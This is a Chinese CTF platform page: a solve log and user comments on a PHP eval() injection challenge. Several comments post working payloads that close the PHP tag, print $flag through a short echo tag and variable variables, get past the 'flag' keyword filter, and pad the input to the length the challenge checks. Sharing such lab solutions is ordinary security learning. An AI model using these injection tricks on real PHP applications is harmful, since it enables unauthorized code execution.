评分(6)
解题动态
mybugku26 攻破了该题 15小时前
奥特曼 攻破了该题 1天前
FlyXz 攻破了该题 1天前
江_塞西莉亚QAQ 攻破了该题 1天前
TTxyz 攻破了该题 5天前
香克斯呀 攻破了该题 7天前
yinlin 攻破了该题 11天前
tytu 攻破了该题 12天前
Tomato薯条 攻破了该题 15天前
晚霞难掩秋色 攻破了该题 15天前
2117783710 攻破了该题 16天前
kxzzy 攻破了该题 16天前
粉红色的-毛 攻破了该题 17天前
凡尘桔子 攻破了该题 19天前
wbq012 攻破了该题 20天前
极品老学生 攻破了该题 23天前
ZZXL_ZZ 攻破了该题 23天前
3024769318 攻破了该题 24天前
shengood 攻破了该题 25天前
评论
FTJJJ 1月前
举报
?flag=$a=~'%99%93%9E%98';?><?= $$a ?>aaaaaaaaaaaaaaaaaaaaaaaaaa
harry2025 4月前
举报
eval()内出现孤立<,必报unexpected '<'错误,无例外。
网恋秀牛子被录屏导致自卑 5月前
举报
考察了闭合,还有短标签
南交混的入朱靖宇 6月前
举报
flag被过滤,构建$a='fla1';$a{*********}='g'; // 把字符串的第 4 个字符改成 g题里要求:strlen($_GET['flag']) == strlen($exam),而 $exam 的长度是 49。
Alune 6月前
举报
个人理解eval构造中存在<? ?> payload 第一个?>中与前一个闭合 而让后面的当作代码执行,不闭合的话后面就是<? <? ?> ?>代码嵌套代码了,会报错
孙谦的鸟岛 8月前
举报
孙千的**来咯
派大星CTF 1年前
举报
eavl()会开启新的php标签,而不是闭合第一行代码的标签所以需要结束eval里开启的标签,在开启一个php代码来执行输出$flag
YUMEKO 2年前
举报
http://xxxxxxxxxx/?flag=$a='fla9';$a{3}='g';?><?=$$a;?>111111111111111333
Daniel2023 2年前
举报
payload: /?flag=$a='fla9';$a{3}='g';?><?=$$a;?>111111111111111111
coo1an 2年前
举报
1、长度是年9, 2、利用短标签和替代,<?php echo $flag;?>使用短标签(<? echo $flag;?>,,再继续使用短标签替代echo ,<?= $flag;?> flag=$f=%274lag%27;$f{0}=%27f%27;?%3E%3C?=$$f;?%3E111111111111111111